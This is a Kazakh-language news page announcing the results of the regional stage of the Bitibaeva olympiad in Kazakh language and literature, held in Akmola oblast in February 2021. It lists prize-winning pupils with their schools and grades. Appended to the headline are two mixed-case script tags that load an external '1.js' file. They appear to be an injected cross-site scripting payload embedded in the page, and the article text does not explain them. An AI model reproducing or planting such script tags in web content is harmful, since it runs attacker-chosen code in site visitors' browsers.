Қазақ тілі мен әдебиеті пәнінен Қ. Бітібаева атындағы республикалық олимпиаданың облыстық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.02.2021

2021 жылғы 18-19 ақпан күндері Ақмола облысы білім басқармасының жанындағы «Өнерпаз дарынды балалармен жұмыс жүргізу жөніндегі облыстық оқу-әдістемелік орталығы» базасында жалпы білім беретін мекемелерінің 9-11 сынып оқушылары арасындағы қазақ тілі мен әдебиеті пәнінен Қ. Бітібаева атындағы республикалық олимпиаданың облыстық кезеңі онлайн режимде өткізілді.

Олимпиада мақсаты – Қазақстан Республикасының дарынды оқушыларын анықтау, дамыту және қолдау көрсету болып табылады.

Олимпиада 2 айналымда өткізілді:

1 айналым – жазбаша – эссе. Қ.О. Бітібаеваның өмірбаяны, оның ғылыми мұрасы және публицистикалық еңбектеріне арналады. 

2 айналым – тест тапсырмалары – қазақ тілі мен әдебиеті пәні бойынша.

Байқауға облыс бойынша 16 ауданнан, Көкшетау, Стеногорск қалалары мен облыстық дарынды балаларға арналған мамандандырылған мектеп интернаттарынан барлығы 61 оқушы қатысты.

Байқау қорытындысы бойынша І-орынға ие болған оқушылар:

  1. Батырбекова Шырын – Бурабай ауданы, №9 мектеп-гимназиясының 9  сынып оқушысы;
  2. Сейілбек Нұрислам – Көкшетау қаласы, «Білім-инновация» лицей-интернатының 10 сынып оқушысы;
  3. Серікбол Әсел – Егіндікөл  ауданы, № 1 Егіндікөл орта мектебінің 11 сынып оқушысы;

ІI-орынға ие болған оқушылар:

  1. Мұрат Диана – Жарқайын ауданы, А.Үкібаев ат.орта мектебінің 9  сынып оқушысы;
  2. Есмағи Нұргүл – Нұр-Сұлтан қаласы, Дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 9  сынып оқушысы;
  3. Төлеуханқызы Бұлбұл – Есіл ауданы, №3 орта мектебінің 10 сынып оқушысы;
  1. Бураканова Дильназ – Көкшетау қаласы, М.Ғабдуллин атындағы № 3 мамандандырылған гимназияның 10 сынып оқушысы;
  2. Қойкен Ұлпан – Степногорск қаласы, Дарынды балаларға арналған "Болашақ" №4 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;
  3. Ғалымжан Аружан – Көкшетау қаласы, С.Жүнісов атындағы № 18 мектеп -лицейінің 11 сынып оқушысы;

ІII-орынға ие болған оқушылар:

  1. Амангельды  Сандуғаш – Қорғалжын ауданы, Қорғалжын мектеп-гимназиясының 9 сынып оқушысы;
  2. Бахад Арайлым – Аршалы ауданы, Абай атындағы Бұлақсай орта мектебінің 9 сынып оқушысы; 
  3. Тлеубай  Әдел  – Көкшетау қаласы, әл-Фараби атындағы IT лицейінің 9 сынып оқушысы; 
  4. Жорабекова Сабира – Астрахан ауданы, № 1 Астрахан   орта мектебінің 10 сынып оқушысы;
  5. Серикбаева Асель – Сандықтау ауданы, Мәдениет орта мектебінің 10 сынып оқушысы;
  6. Жусупова Аида – Целиноград ауданы, Қажымұқан орта мектебінің 10 сынып оқушысы;
  7. Бауыржан Сункар – Буланды  ауданы, № 1 Никольск орта мектебінің 11 сынып оқушысы;
  8. Хайвар Жалғас – Зеренді ауданы, Ақадыр орта мектебінің 11 сынып оқушысы;
  9. Сатыбаева Аружан – Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған  мектеп-интернатының 11 сынып оқушысы;

Грамотаға ие болған оқушылар тізімі:

  1. Муратбек Шұғыла – Ақкөл ауданы, Сазды бұлақ орта мектебінің 9 сынып оқушысы; 
  2. Қожахметова Айгерим – Жақсы ауданы, Жақсы №1 орта мектебінің 9 сынып оқушысы; 
  3. Хойшыбай Назым – Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған  мектеп-интернатының 9 сынып оқушысы; 
  4. Букенова Ғазиза – Нұр-Сұлтан қаласы, Дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 10 сынып оқушысы;
  5. Әбдрахим Көркем – Степногорск қаласы, Дарынды балаларға арналған "Болашақ" №4 облыстық мамандандырылған   мектеп-интернатының 10 сынып оқушысы;
  6. Рафаилова Дильназ – Нұр-Сұлтан қаласы, Дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 11 сынып оқушысы;
  7. Худайберген Саяжан – Степногорск қаласы, Байқоныс орта мектебінің 11 сынып оқушысы.

Ақмола облысының женімпаздары мен жүлдегерлерін шын жүректен құттықтаймыз.

Просмотров: 459


Пікір қосу



Деректерді қолтаңбаға қосу